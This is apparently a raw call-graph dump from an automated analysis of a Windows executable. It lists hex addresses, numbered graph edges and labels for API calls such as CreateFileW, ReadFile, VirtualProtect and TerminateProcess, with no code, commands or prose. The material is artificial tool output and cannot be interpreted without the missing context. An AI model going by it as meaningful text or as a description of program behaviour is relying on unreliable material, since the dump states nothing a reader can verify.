8d0064 101870->101862 101870->101863 101872->101875 101876->101864 101877->101864 101878->101864 101879->101864 102078 8f9e4a 66 API calls 3 library calls 101881->102078 102077 8f9e4a 66 API calls 3 library calls 101884->102077 102071 89f6a3 282 API calls 101886->102071 101888->101857 102075 899c90 59 API calls Mailbox 101889->102075 102076 8f9e4a 66 API calls 3 library calls 101891->102076 101893->101854 101893->101875 102069 899d3c 60 API calls Mailbox 101894->102069 101896 89b22d 102070 899d3c 60 API calls Mailbox 101896->102070 101898->101857 101903 8fd09a 101902->101903 101906 897667 59 API calls 101903->101906 101936 8fd178 Mailbox 101903->101936 101904 8b0db6 Mailbox 59 API calls 101905 8fd1c8 101904->101905 101907 8fd1d4 101905->101907 102171 8957a6 60 API calls Mailbox 101905->102171 101908 8fd0c9 101906->101908 102080 899837 101907->102080 101909 897667 59 API calls 101908->101909 101911 8fd0d2 101909->101911 101914 899837 59 API calls 101911->101914 101916 8fd0de 101914->101916 102107 89459b 101916->102107 101919 8fd1ff GetLastError 101922 8fd218 101919->101922 101920 8fd233 101924 8fd25e 101920->101924 101925 8fd295 101920->101925 101921 8fd0f3 102158 897b2e 101921->102158 101941 8fd188 Mailbox 101922->101941 102172 8958ba CloseHandle 101922->102172 101927 8b0db6 Mailbox 59 API calls 101924->101927 101928 8b0db6 Mailbox 59 API calls 101925->101928 101929 8fd263 101927->101929 101932 8fd29a 101928->101932 101933 8fd274 101929->101933 101935 897667 59 API calls 101929->101935 101938 897667 59 API calls 101932->101938 101932->101941 102173 90fbce 59 API calls 2 library calls 101933->102173 101935->101933 101936->101904 101936->101941 101937 8fd13a 101940 897de1 59 API calls 101937->101940 101938->101941 101942 8fd147 101940->101942 101941->101857 102170 8f3a2a 63 API calls Mailbox 101942->102170 101944 8fd150 Mailbox 101944->101936 102252 90cadd 101945->102252 101947 90df33 101947->101857 102343 899a98 101948->102343 101951 8b0db6 Mailbox 59 API calls 101952 8a1ff4 101951->101952 101953 8a2004 101952->101953 102371 8957a6 60 API calls Mailbox 101952->102371 101955 899837 59 API calls 101953->101955 101956 8a2012 101955->101956 101957 8957f6 67 API calls 101956->101957 101960 8a2021 101957->101960 101958 895cdf 2 API calls 101962 8a203d 101958->101962 101959 8a2029 101959->101958 101959->101962 101960->101959 102374 8958ba CloseHandle 101960->102374 101963 8d65e7 101962->101963 101964 8a2057 101962->101964 101966 8b0db6 Mailbox 59 API calls 101963->101966 101965 897667 59 API calls 101964->101965 101967 8a205f 101965->101967 101968 8d65ed 101966->101968 102356 895572 101967->102356 101970 8d6601 101968->101970 102375 895850 ReadFile SetFilePointerEx 101968->102375 101975 8d6605 _memmove 101970->101975 102376 8f76c4 59 API calls 2 library calls 101970->102376 101972 8a206e 101972->101975 102372 899a3c 59 API calls Mailbox 101972->102372 101976 8a2082 Mailbox 101977 8a20bc 101976->101977 101978 895c6f CloseHandle 101976->101978 101977->101857 101979 8a20b0 101978->101979 101979->101977 102373 8958ba CloseHandle 101979->102373 101982 897667 59 API calls 101981->101982 101983 90c2f4 101982->101983 101984 897667 59 API calls 101983->101984 101985 90c2fc 101984->101985 101986 897667 59 API calls 101985->101986 101987 90c304 101986->101987 101988 899837 59 API calls 101987->101988 102012 90c312 101988->102012 101989 897bcc 59 API calls 101989->102012 101990 90c4fb 101994 90c528 Mailbox 101990->101994 102389 899a3c 59 API calls Mailbox 101990->102389 101991 90c4e2 102382 897cab 101991->102382 101994->101857 101995 897924 59 API calls 101995->102012 101996 90c4fd 101999 897cab 59 API calls 101996->101999 101997 898047 59 API calls 101997->102012 102001 90c50c 101999->102001 102000 897b2e 59 API calls 102000->101990 102003 897b2e 59 API calls 102001->102003 102002 897e4f 59 API calls 102005 90c3a9 CharUpperBuffW 102002->102005 102003->101990 102004 897e4f 59 API calls 102007 90c469 CharUpperBuffW 102004->102007 102380 89843a 68 API calls 102005->102380 102381 89c5a7 69 API calls 2 library calls 102007->102381 102009 899837 59 API calls 102009->102012 102010 897cab 59 API calls 102010->102012 102011 897b2e 59 API calls 102011->102012 102012->101989 102012->101990 102012->101991 102012->101994 102012->101995 102012->101996 102012->101997 102012->102002 102012->102004 102012->102009 102012->102010 102012->102011 102014 8f7962 102013->102014 102015 8b0db6 Mailbox 59 API calls 102014->102015 102016 8f7970 102015->102016 102017 8f797e 102016->102017 102018 897667 59 API calls 102016->102018 102017->101857 102018->102017 102020 897df0 __NMSG_WRITE _memmove 102019->102020 102021 8b0db6 Mailbox 59 API calls 102020->102021 102022 897e2e 102021->102022 102022->101857 102024 90bcb0 102023->102024 102025 90bc96 102023->102025 102396 90a213 59 API calls Mailbox 102024->102396 102395 8f9e4a 66 API calls 3 library calls 102025->102395 102028 90bcbb 102029 899ea0 281 API calls 102028->102029 102030 90bd1c 102029->102030 102031 90bdae 102030->102031 102034 90bd5d 102030->102034 102056 90bca8 Mailbox 102030->102056 102032 90be04 102031->102032 102033 90bdb4 102031->102033 102035 899837 59 API calls 102032->102035 102032->102056 102418 8f791a 59 API calls 102033->102418 102397 8f72df 59 API calls Mailbox 102034->102397 102037 90be16 102035->102037 102040 897e4f 59 API calls 102037->102040 102038 90bdd7 102419 895d41 59 API calls Mailbox 102038->102419 102043 90be3a CharUpperBuffW 102040->102043 102042 90bd8d 102398 89f460 102042->102398 102046 90be54 102043->102046 102044 90bddf Mailbox 102420 89fce0 282 API calls 2 library calls 102044->102420 102047 90bea7 102046->102047 102048 90be5b 102046->102048 102050 899837 59 API calls 102047->102050 102421 8f72df 59 API calls Mailbox 102048->102421 102051 90beaf 102050->102051 102422 899e5d 60 API calls 102051->102422 102054 90be89 102055 89f460 281 API calls 102054->102055 102055->102056 102056->101857 102057 90beb9 102057->102056 102058 899837 59 API calls 102057->102058 102059 90bed4 102058->102059 102423 895d41 59 API calls Mailbox 102059->102423 102061 90bee4 102424 89fce0 282 API calls 2 library calls 102061->102424 102855 8e60c0 102063->102855 102065 8e618c 102065->101857 102066->101864 102067->101864 102068->101857 102069->101896 102070->101886 102071->101859 102072->101857 102073->101869 102074->101893 102075->101893 102076->101893 102077->101875 102078->101862 102079->101875 102081 899851 102080->102081 102086 89984b 102080->102086 102082 899857 __itow 102081->102082 102084 8cf4da 102081->102084 102092 8cf552 __i64tow Mailbox _wcscpy 102081->102092 102083 8b0db6 Mailbox 59 API calls 102082->102083 102085 899871 102083->102085 102087 8b0db6 Mailbox 59 API calls 102084->102087 102084->102092 102085->102086 102088 897de1 59 API calls 102085->102088 102094 8957f6 102086->102094 102090 8cf51f 102087->102090 102088->102086 102089 8b0db6 Mailbox 59 API calls 102091 8cf545 102089->102091 102090->102089 102091->102092 102093 897de1 59 API calls 102091->102093 102093->102092 102174 895c6f 102094->102174 102098 895844 102098->101919 102098->101920 102099 895821 102099->102098 102186 895610 102099->102186 102101 895833 102203 89527b SetFilePointerEx SetFilePointerEx 102101->102203 102103 8cdc07 102204 8f345a SetFilePointerEx SetFilePointerEx WriteFile 102103->102204 102104 89583a 102104->102098 102104->102103 102106 8cdc37 102106->102098 102108 897667 59 API calls 102107->102108 102109 8945b1 102108->102109 102110 897667 59 API calls 102109->102110 102111 8945b9 102110->102111 102112 897667 59 API calls 102111->102112 102113 8945c1 102112->102113 102114 897667 59 API calls 102113->102114 102115 8945c9 102114->102115 102116 8945fd 102115->102116 102117 8cd4d2 102115->102117 102118 89784b 59 API calls 102116->102118 102119 898047 59 API calls 102117->102119 102120 89460b 102118->102120 102121 8cd4db 102119->102121 102122 897d2c 59 API calls 102120->102122 102123 897d8c 59 API calls 102121->102123 102124 894615 102122->102124 102126 894640 102123->102126 102125 89784b 59 API calls 102124->102125 102124->102126 102129 894636 102125->102129 102127 894680 102126->102127 102130 89465f 102126->102130 102140 8cd4fb 102126->102140 102223 89784b 102127->102223 102132 897d2c 59 API calls 102129->102132 102236 8979f2 102130->102236 102131 894691 102135 8946a3 102131->102135 102138 898047 59 API calls 102131->102138 102132->102126 102133 8cd5cb 102136 897bcc 59 API calls 102133->102136 102139 8946b3 102135->102139 102141 898047 59 API calls 102135->102141 102153 8cd588 102136->102153 102138->102135 102143 8946ba 102139->102143 102145 898047 59 API calls 102139->102145 102140->102133 102142 8cd5b4 102140->102142 102152 8cd532 102140->102152 102141->102139 102142->102133 102148 8cd59f 102142->102148 102146 898047 59 API calls 102143->102146 102155 8946c1 Mailbox 102143->102155 102144 89784b 59 API calls 102144->102127 102145->102143 102146->102155 102147 8979f2 59 API calls 102147->102153 102151 897bcc 59 API calls 102148->102151 102149 8cd590 102150 897bcc 59 API calls 102149->102150 102150->102153 102151->102153 102152->102149 102156 8cd57b 102152->102156 102153->102127 102153->102147 102239 897924 59 API calls 2 library calls 102153->102239 102155->101921 102157 897bcc 59 API calls 102156->102157 102157->102153 102159 8cec6b 102158->102159 102160 897b40 102158->102160 102247 8e7bdb 59 API calls _memmove 102159->102247 102241 897a51 102160->102241 102163 897b4c 102163->101936 102167 8f3c37 102163->102167 102164 8cec75 102165 898047 59 API calls 102164->102165 102166 8cec7d Mailbox 102165->102166 102248 8f445a GetFileAttributesW 102167->102248 102170->101944 102171->101907 102172->101941 102173->101941 102175 895802 102174->102175 102176 895c88 102174->102176 102178 895c99 102175->102178 102176->102175 102177 895c8d CloseHandle 102176->102177 102177->102175 102179 8cdd58 102178->102179 102180 895cb2 CreateFileW 102178->102180 102181 8cdd5e CreateFileW 102179->102181 102182 895cd4 102179->102182 102180->102182 102181->102182 102183 8cdd84 102181->102183 102182->102099 102205 895aee 102183->102205 102187 89562b 102186->102187 102188 8cdba5 102186->102188 102189 895aee 2 API calls 102187->102189 102202 8956ba 102187->102202 102188->102202 102218 895cdf 102188->102218 102190 89564d 102189->102190 102215 89522e 102190->102215 102194 895664 102195 8b0db6 Mailbox 59 API calls 102194->102195 102196 89566f 102195->102196 102197 89522e 59 API calls 102196->102197 102198 89567a 102197->102198 102199 895bc0 2 API calls 102198->102199 102200 8956a7 102199->102200 102201 895aee 2 API calls 102200->102201 102201->102202 102202->102101 102203->102104 102204->102106 102212 895b08 102205->102212 102206 895b8f SetFilePointerEx 102213 895c4e SetFilePointerEx 102206->102213 102209 8cdd28 102214 895c4e SetFilePointerEx 102209->102214 102210 895b63 102210->102182 102211 8cdd42 102212->102206 102212->102209 102212->102210 102213->102210 102214->102211 102216 8b0db6 Mailbox 59 API calls 102215->102216 102217 895240 102216->102217 102217->102188 102217->102194 102219 895aee 2 API calls 102218->102219 102220 895d00 102219->102220 102221 895aee 2 API calls 102220->102221 102222 895d14 102221->102222 102222->102202 102224 89785a 102223->102224 102225 8978b7 102223->102225 102224->102225 102227 897865 102224->102227 102226 897d2c 59 API calls 102225->102226 102232 897888 _memmove 102226->102232 102228 8ceb09 102227->102228 102229 897880 102227->102229 102231 898029 59 API calls 102228->102231 102240 897f27 59 API calls Mailbox 102229->102240 102233 8ceb13 102231->102233 102232->102131 102234 8b0db6 Mailbox 59 API calls 102233->102234 102235 8ceb33 102234->102235 102237 897e4f 59 API calls 102236->102237 102238 894669 102237->102238 102238->102127 102238->102144 102239->102153 102240->102232 102242 897a5f 102241->102242 102243 897a85 _memmove 102241->102243 102242->102243 102244 8b0db6 Mailbox 59 API calls 102242->102244 102243->102163 102245 897ad4 102244->102245 102246 8b0db6 Mailbox 59 API calls 102245->102246 102246->102243 102247->102164 102249 8f3c3e 102248->102249 102250 8f4475 FindFirstFileW 102248->102250 102249->101936 102249->101937 102250->102249 102251 8f448a FindClose 102250->102251 102251->102249 102253 899837 59 API calls 102252->102253 102254 90cb1a 102253->102254 102256 90cb61 Mailbox 102254->102256 102290 90d7a5 102254->102290 102256->101947 102257 90cf2e 102330 90d8c8 66 API calls Mailbox 102257->102330 102260 90cbb2 Mailbox 102260->102256 102263 899837 59 API calls 102260->102263 102276 90cdb9 102260->102276 102321 90fbce 59 API calls 2 library calls 102260->102321 102322 90cfdf 61 API calls 2 library calls 102260->102322 102261 90cf3d 102262 90cdc7 102261->102262 102265 90cf49 102261->102265 102303 90c96e 102262->102303 102263->102260 102265->102256 102269 90ce00 102317 8b0c08 102269->102317 102272 90ce33 102324 8992ce 59 API calls Mailbox 102272->102324 102273 90ce1a 102323 8f9e4a 66 API calls 3 library calls 102273->102323 102276->102257 102276->102262 102277 90ce3f 102325 899050 59 API calls Mailbox 102277->102325 102278 90ce25 GetCurrentProcess TerminateProcess 102278->102272 102280 90ce55 102289 90ce7c 102280->102289 102326 898d40 59 API calls Mailbox 102280->102326 102282 90cfa4 102282->102256 102286 90cfb8 FreeLibrary 102282->102286 102283 90ce6b 102327 90d649 82 API calls _free 102283->102327 102286->102256 102289->102282 102328 898d40 59 API calls Mailbox 102289->102328 102329 899d3c 60 API calls Mailbox 102289->102329 102331 90d649 82 API calls _free 102289->102331 102291 897e4f 59 API calls 102290->102291 102292 90d7c0 CharLowerBuffW 102291->102292 102332 8ef167 102292->102332 102296 897667 59 API calls 102297 90d7f9 102296->102297 102298 89784b 59 API calls 102297->102298 102299 90d810 102298->102299 102300 897d2c 59 API calls 102299->102300 102301 90d81c Mailbox 102300->102301 102302 90d858 Mailbox 102301->102302 102339 90cfdf 61 API calls 2 library calls 102301->102339 102302->102260 102304 90c9de 102303->102304 102305 90c989 102303->102305 102309 90da50 102304->102309 102306 8b0db6 Mailbox 59 API calls 102305->102306 102308 90c9ab 102306->102308 102307 8b0db6 Mailbox 59 API calls 102307->102308 102308->102304 102308->102307 102310 90dc79 Mailbox 102309->102310 102316 90da73 _strcat _wcscpy __NMSG_WRITE 102309->102316 102310->102269 102311 899b98 59 API calls 102311->102316 102312 899be6 59 API calls 102312->102316 102313 899837 59 API calls 102313->102316 102314 8b571c 58 API calls __crtGetStringTypeA_stat 102314->102316 102316->102310 102316->102311 102316->102312 102316->102313 102316->102314 102342 8f5887 61 API calls 2 library calls 102316->102342 102318 8b0c1d 102317->102318 102319 8b0cb5 VirtualProtect 102318->102319 102320 8b0c83 102318->102320 102319->102320 102320->102272 102320->102273 102321->102260 102322->102260 102323->102278 102324->102277 102325->102280 102326->102283 102327->102289 102328->102289 102329->102289 102330->102261 102331->102289 102333 8ef192 __NMSG_WRITE 102332->102333 102334 8ef1d1 102333->102334 102337 8ef1c7 102333->102337 102338 8ef278 102333->102338 102334->102296 102334->102301 102337->102334 102340 8978c4 61 API calls 102337->102340 102338->102334 102341 8978c4 61 API calls 102338->102341 102339->102302 102340->102337 102341->102338 102342->102316 102344 899aa8 102343->102344 102345 8cf7d6 102343->102345 102349 8b0db6 Mailbox 59 API calls 102344->102349 102346 8cf7e7 102345->102346 102347 897bcc 59 API calls 102345->102347 102348 897d8c 59 API calls 102346->102348 102347->102346 102351 8cf7f1 102348->102351 102350 899abb 102349->102350 102350->102351 102353 899ac6 102350->102353 102352 899ad4 102351->102352 102354 897667 59 API calls 102351->102354 102352->101951 102352->101959 102353->102352 102355 897de1 59 API calls 102353->102355 102354->102352 102355->102352 102357 8955a2 102356->102357 102358 89557d 102356->102358 102359 897d8c 59 API calls 102357->102359 102358->102357 102362 89558c 102358->102362 102363 8f325e 102359->102363 102360 8f328d 102360->101972 102364 895ab8 59 API calls 102362->102364 102363->102360 102377 8f31fa ReadFile SetFilePointerEx 102363->102377 102378 897924 59 API calls 2 library calls 102363->102378 102366 8f337e 102364->102366 102367 8954d2 61 API calls 102366->102367 102368 8f338c 102367->102368 102370 8f339c Mailbox 102368->102370 102379 8977da 61 API calls Mailbox 102368->102379 102370->101972 102371->101953 102372->101976 102373->101977 102374->101959 102375->101970 102376->101975 102377->102363 102378->102363 102379->102370 102380->102012 102381->102012 102383 8ced4a 102382->102383 102384 897cbf 102382->102384 102386 898029 59 API calls 102383->102386 102390 897c50 102384->102390 102388 8ced55 __NMSG_WRITE _memmove 102386->102388 102387 897cca 102387->102000 102389->101994 102391 897c5f __NMSG_WRITE 102390->102391 102392 898029 59 API calls 102391->102392 102393 897c70 _memmove 102391->102393 102394 8ced07 _memmove 102392->102394 102393->102387 102395->102056 102396->102028 102397->102042 102399 89f4ba 102398->102399 102400 89f650 102398->102400 102401 8d441e 102399->102401 102404 89f4c6 102399->102404 102402 897de1 59 API calls 102400->102402 102403 90bc6b 282 API calls 102401->102403 102409 89f58c Mailbox 102402->102409 102406 8d442c 102403->102406 102515 89f290 282 API calls 2 library calls 102404->102515 102410 89f630 102406->102410 102517 8f9e4a 66 API calls 3 library calls 102406->102517 102408 89f4fd 102408->102406 102408->102409 102408->102410 102412 89f5e3 102409->102412 102416 8f3c37 3 API calls 102409->102416 102425 90445a 102409->102425 102432 894e4a 102409->102432 102438 90df37 102409->102438 102441 8fcb7a 102409->102441 102410->102056 102412->102410 102516 899c90 59 API calls Mailbox 102412->102516 102416->102412 102418->102038 102419->102044 102420->102056 102421->102054 102422->102057 102423->102061 102424->102056 102426 899837 59 API calls 102425->102426 102428 904494 102426->102428 102427 9044c9 102430 899a98 59 API calls 102427->102430 102431 9044cd 102427->102431 102428->102427 102429 899ea0 282 API calls 102428->102429 102429->102427 102430->102431 102431->102412 102433 894e5b 102432->102433 102434 894e54 102432->102434 102436 894e7b FreeLibrary 102433->102436 102437 894e6a 102433->102437 102435 8b53a6 __fcloseall 65 API calls 102434->102435 102435->102433 102436->102437 102437->102412 102439 90cadd 107 API calls 102438->102439 102440 90df47 102439->102440 102440->102412 102442 897667 59 API calls 102441->102442 102443 8fcbaf 102442->102443 102444 897667 59 API calls 102443->102444 102446 8fcbb8 102444->102446 102445 899837 59 API calls 102447 8fcbe9 102445->102447 102446->102445 102448 8fcc0b 102447->102448 102452 8fccea 102447->102452 102456 8fcd1a Mailbox 102447->102456 102449 899837 59 API calls 102448->102449 102450 8fcc17 102449->102450 102451 898047 59 API calls 102450->102451 102454 8fcc23 102451->102454 102453 897667 59 API calls 102452->102453 102452->102456 102455 8fcd4b 102453->102455 102458 8fcc69 102454->102458 102459 8fcc37 102454->102459 102457 897667 59 API calls 102455->102457 102456->102412 102460 8fcd54 102457->102460 102462 899837 59 API calls 102458->102462 102461 898047 59 API calls 102459->102461 102463 897667 59 API calls 102460->102463 102464 8fcc47 102461->102464 102465 8fcc76 102462->102465 102466 8fcd5d 102463->102466 102467 897cab 59 API calls 102464->102467 102468 898047 59 API calls 102465->102468 102469 897667 59 API calls 102466->102469 102470 8fcc51 102467->102470 102471 8fcc82 102468->102471 102472 8fcd66 102469->102472 102473 899837 59 API calls 102470->102473 102622 8f4a31 GetFileAttributesW 102471->102622 102475 899837 59 API calls 102472->102475 102477 8fcc5d 102473->102477 102476 8fcd73 102475->102476 102479 89459b 59 API calls 102476->102479 102480 897b2e 59 API calls 102477->102480 102478 8fcc8b 102481 8fcc9e 102478->102481 102482 8979f2 59 API calls 102478->102482 102483 8fcd8e 102479->102483 102480->102458 102484 899837 59 API calls 102481->102484 102490 8fcca4 102481->102490 102482->102481 102485 8979f2 59 API calls 102483->102485 102486 8fcccb 102484->102486 102487 8fcd9d 102485->102487 102623 8f37ef 75 API calls Mailbox 102486->102623 102489 8fcdd1 102487->102489 102491 8979f2 59 API calls 102487->102491 102492 898047 59 API calls 102489->102492 102490->102456 102493 8fcdae 102491->102493 102494 8fcddf 102492->102494 102493->102489 102497 897bcc 59 API calls 102493->102497 102495 897b2e 59 API calls 102494->102495 102496 8fcded 102495->102496 102498 897b2e 59 API calls 102496->102498 102499 8fcdc3 102497->102499 102500 8fcdfb 102498->102500 102501 897bcc 59 API calls 102499->102501 102502 897b2e 59 API calls 102500->102502 102501->102489 102503 8fce09 102502->102503 102504 899837 59 API calls 102503->102504 102505 8fce15 102504->102505 102518 8f4071 102505->102518 102507 8fce26 102508 8f3c37 3 API calls 102507->102508 102509 8fce30 102508->102509 102510 899837 59 API calls 102509->102510 102513 8fce61 102509->102513 102511 8fce4e 102510->102511 102572 8f9155 102511->102572 102514 894e4a 66 API calls 102513->102514 102514->102456 102515->102408 102516->102412 102517->102410 102519 8f408d 102518->102519 102520 8f4092 102519->102520 102521 8f40a0 102519->102521 102522 898047 59 API calls 102520->102522 102523 897667 59 API calls 102521->102523 102571 8f409b Mailbox 102522->102571 102524 8f40a8 102523->102524 102525 897667 59 API calls 102524->102525 102526 8f40b0 102525->102526 102527 897667 59 API calls 102526->102527 102528 8f40bb 102527->102528 102529 897667 59 API calls 102528->102529 102530 8f40c3 102529->102530 102531 897667 59 API calls 102530->102531 102532 8f40cb 102531->102532 102533 897667 59 API calls 102532->102533 102534 8f40d3 102533->102534 102535 897667 59 API calls 102534->102535 102536 8f40db 102535->102536 102537 897667 59 API calls 102536->102537 102538 8f40e3 102537->102538 102539 89459b 59 API calls 102538->102539 102540 8f40fa 102539->102540 102541 89459b 59 API calls 102540->102541 102542 8f4113 102541->102542 102543 8979f2 59 API calls 102542->102543 102544 8f411f 102543->102544 102545 8f4132 102544->102545 102546 897d2c 59 API calls 102544->102546 102547 8979f2 59 API calls 102545->102547 102546->102545 102548 8f413b 102547->102548 102549 8f414b 102548->102549 102550 897d2c 59 API calls 102548->102550 102551 898047 59 API calls 102549->102551 102550->102549 102552 8f4157 102551->102552 102553 897b2e 59 API calls 102552->102553 102554 8f4163 102553->102554 102624 8f4223 59 API calls 102554->102624 102556 8f4172 102625 8f4223 59 API calls 102556->102625 102558 8f4185 102559 8979f2 59 API calls 102558->102559 102560 8f418f 102559->102560 102561 8f41a6 102560->102561 102562 8f4194 102560->102562 102564 8979f2 59 API calls 102561->102564 102563 897cab 59 API calls 102562->102563 102565 8f41a1 102563->102565 102566 8f41af 102564->102566 102569 897b2e 59 API calls 102565->102569 102567 8f41cd 102566->102567 102568 897cab 59 API calls 102566->102568 102570 897b2e 59 API calls 102567->102570 102568->102565 102569->102567 102570->102571 102571->102507 102573 8f9162 __ftell_nolock 102572->102573 102574 8b0db6 Mailbox 59 API calls 102573->102574 102575 8f91bf 102574->102575 102576 89522e 59 API calls 102575->102576 102577 8f91c9 102576->102577 102626 8f8f5f 102577->102626 102579 8f91d4 102629 894ee5 102579->102629 102581 8f91e7 _wcscmp 102582 8f920b 102581->102582 102583 8f92b8 102581->102583 102643 8f9734 80 API calls 2 library calls 102582->102643 102646 8f9734 80 API calls 2 library calls 102583->102646 102586 8f9210 102590 8f92c1 102586->102590 102644 8b40fb 58 API calls __wsplitpath_helper 102586->102644 102590->102513 102591 894f0b 74 API calls 102593 8f92ed 102591->102593 102592 8f9239 _wcscat _wcscpy 102645 8b40fb 58 API calls __wsplitpath_helper 102592->102645 102594 894f0b 74 API calls 102593->102594 102596 8f9308 102594->102596 102597 894f0b 74 API calls 102596->102597 102598 8f9318 102597->102598 102599 894f0b 74 API calls 102598->102599 102601 8f9333 102599->102601 102600 8f9284 _wcscat 102600->102590 102634 894f0b 102600->102634 102602 894f0b 74 API calls 102601->102602 102603 8f9343 102602->102603 102604 894f0b 74 API calls 102603->102604 102605 8f9353 102604->102605 102606 894f0b 74 API calls 102605->102606 102607 8f9363 102606->102607 102639 8f98e3 GetTempPathW GetTempFileNameW 102607->102639 102609 8f943a 102610 8b53a6 __fcloseall 65 API calls 102609->102610 102611 8f9445 102610->102611 102613 8f945f 102611->102613 102614 8f944b DeleteFileW 102611->102614 102612 894f0b 74 API calls 102619 8f936f 102612->102619 102615 8f9505 CopyFileW 102613->102615 102620 8f9469 _wcsncpy 102613->102620 102614->102590 102616 8f952d DeleteFileW 102615->102616 102617 8f951b DeleteFileW 102615->102617 102640 8f98a2 CreateFileW 102616->102640 102617->102590 102619->102590 102619->102609 102619->102612 102620->102616 102621 8f94f4 DeleteFileW 102620->102621 102621->102590 102622->102478 102623->102490 102624->102556 102625->102558 102647 8b520a GetSystemTimeAsFileTime 102626->102647 102628 8f8f6e 102628->102579 102630 8cd9ab 102629->102630 102631 894ef4 102629->102631 102649 8b584d 102631->102649 102633 894f02 102633->102581 102635 8cd9cd 102634->102635 102636 894f1d 102634->102636 102666 8b55e2 102636->102666 102639->102619 102641 8f98de 102640->102641 102642 8f98c8 SetFileTime CloseHandle 102640->102642 102641->102590 102642->102641 102643->102586 102644->102592 102645->102600 102646->102600 102648 8b5238 __aulldiv 102647->102648 102648->102628 102650 8b5859 __setmode 102649->102650 102651 8b586b 102650->102651 102653 8b5891 102650->102653 102662 8b8b28 58 API calls __getptd_noexit 102651->102662 102655 8b6c11 __lock_file 59 API calls 102653->102655 102654 8b5870 102663 8b8db6 9 API calls __cftof_l 102654->102663 102657 8b5897 102655->102657 102664 8b57be 67 API calls 5 library calls 102657->102664 102659 8b58a6 102665 8b58c8 LeaveCriticalSection LeaveCriticalSection _fprintf 102659->102665 102661 8b587b __setmode 102661->102633 102662->102654 102663->102661 102664->102659 102665->102661 102669 8b55fd 102666->102669 102668 894f2e 102668->102591 102670 8b5609 __setmode 102669->102670 102671 8b5644 __setmode 102670->102671 102672 8b561f _memset 102670->102672 102673 8b564c 102670->102673 102671->102668 102696 8b8b28 58 API calls __getptd_noexit 102672->102696 102674 8b6c11 __lock_file 59 API calls 102673->102674 102676 8b5652 102674->102676 102682 8b541d 102676->102682 102678 8b5639 102697 8b8db6 9 API calls __cftof_l 102678->102697 102683 8b5453 102682->102683 102686 8b5438 _memset 102682->102686 102698 8b5686 LeaveCriticalSection LeaveCriticalSection _fprintf 102683->102698 102684 8b5443 102787 8b8b28 58 API calls __getptd_noexit 102684->102787 102686->102683 102686->102684 102687 8b5493 102686->102687 102687->102683 102690 8b55a4 _memset 102687->102690 102691 8b46e6 __filbuf 58 API calls 102687->102691 102699 8c0e5b 102687->102699 102767 8c0ba7 102687->102767 102789 8c0cc8 58 API calls 3 library calls 102687->102789 102790 8b8b28 58 API calls __getptd_noexit 102690->102790 102691->102687 102695 8b5448 102788 8b8db6 9 API calls __cftof_l 102695->102788 102696->102678 102697->102671 102698->102671 102700 8c0e7c 102699->102700 102701 8c0e93 102699->102701 102800 8b8af4 58 API calls __getptd_noexit 102700->102800 102703 8c15cb 102701->102703 102708 8c0ecd 102701->102708 102816 8b8af4 58 API calls __getptd_noexit 102703->102816 102705 8c0e81 102801 8b8b28 58 API calls __getptd_noexit 102705->102801 102706 8c15d0 102817 8b8b28 58 API calls __getptd_noexit 102706->102817 102710 8c0ed5 102708->102710 102719 8c0eec 102708->102719 102802 8b8af4 58 API calls __getptd_noexit 102710->102802 102711 8c0ee1 102818 8b8db6 9 API calls __cftof_l 102711->102818 102713 8c0eda 102803 8b8b28 58 API calls __getptd_noexit 102713->102803 102715 8c0f01 102804 8b8af4 58 API calls __getptd_noexit 102715->102804 102718 8c0f1b 102718->102715 102724 8c0f26 102718->102724 102719->102715 102719->102718 102720 8c0f39 102719->102720 102748 8c0e88 102719->102748 102805 8b881d 58 API calls 2 library calls 102720->102805 102722 8c0f49 102725 8c0f6c 102722->102725 102726 8c0f51 102722->102726 102791 8c5c6b 102724->102791 102808 8c18c1 60 API calls 3 library calls 102725->102808 102806 8b8b28 58 API calls __getptd_noexit 102726->102806 102727 8c103a 102729 8c10b3 ReadFile 102727->102729 102734 8c1050 GetConsoleMode 102727->102734 102732 8c10d5 102729->102732 102733 8c1593 GetLastError 102729->102733 102731 8c0f56 102807 8b8af4 58 API calls __getptd_noexit 102731->102807 102732->102733 102740 8c10a5 102732->102740 102736 8c1093 102733->102736 102737 8c15a0 102733->102737 102738 8c1064 102734->102738 102739 8c10b0 102734->102739 102750 8c1099 102736->102750 102809 8b8b07 58 API calls 2 library calls 102736->102809 102814 8b8b28 58 API calls __getptd_noexit 102737->102814 102738->102739 102742 8c106a ReadConsoleW 102738->102742 102739->102729 102749 8c1377 102740->102749 102740->102750 102752 8c110a 102740->102752 102742->102740 102745 8c108d GetLastError 102742->102745 102744 8c15a5 102815 8b8af4 58 API calls __getptd_noexit 102744->102815 102745->102736 102747 8b2d55 _free 58 API calls 102747->102748 102748->102687 102749->102750 102754 8c147d ReadFile 102749->102754 102750->102747 102750->102748 102753 8c1176 ReadFile 102752->102753 102759 8c11f7 102752->102759 102755 8c1197 GetLastError 102753->102755 102764 8c11a1 102753->102764 102758 8c14a0 GetLastError 102754->102758 102766 8c14ae 102754->102766 102755->102764 102756 8c12b4 102761 8c1264 MultiByteToWideChar 102756->102761 102812 8c18c1 60 API calls 3 library calls 102756->102812 102757 8c12a4 102811 8b8b28 58 API calls __getptd_noexit 102757->102811 102758->102766 102759->102750 102759->102756 102759->102757 102759->102761 102761->102745 102761->102750 102764->102752 102810 8c18c1 60 API calls 3 library calls 102764->102810 102766->102749 102813 8c18c1 60 API calls 3 library calls 102766->102813 102768 8c0bb2 102767->102768 102772 8c0bc7 102767->102772 102852 8b8b28 58 API calls __getptd_noexit 102768->102852 102770 8c0bb7 102853 8b8db6 9 API calls __cftof_l 102770->102853 102773 8c0bfc 102772->102773 102779 8c0bc2 102772->102779 102854 8c5fe4 58 API calls __malloc_crt 102772->102854 102775 8b46e6 __filbuf 58 API calls 102773->102775 102776 8c0c10 102775->102776 102819 8c0d47 102776->102819 102778 8c0c17 102778->102779 102780 8b46e6 __filbuf 58 API calls 102778->102780 102779->102687 102781 8c0c3a 102780->102781 102781->102779 102782 8b46e6 __filbuf 58 API calls 102781->102782 102783 8c0c46 102782->102783 102783->102779 102784 8b46e6 __filbuf 58 API calls 102783->102784 102785 8c0c53 102784->102785 102786 8b46e6 __filbuf 58 API calls 102785->102786 102786->102779 102787->102695 102788->102683 102789->102687 102790->102695 102792 8c5c76 102791->102792 102793 8c5c83 102791->102793 102794 8b8b28 __cftof_l 58 API calls 102792->102794 102795 8c5c8f 102793->102795 102796 8b8b28 __cftof_l 58 API calls 102793->102796 102797 8c5c7b 102794->102797 102795->102727 102798 8c5cb0 102796->102798 102797->102727 102799 8b8db6 __cftof_l 9 API calls 102798->102799 102799->102797 102800->102705 102801->102748 102802->102713 102803->102711 102804->102713 102805->102722 102806->102731 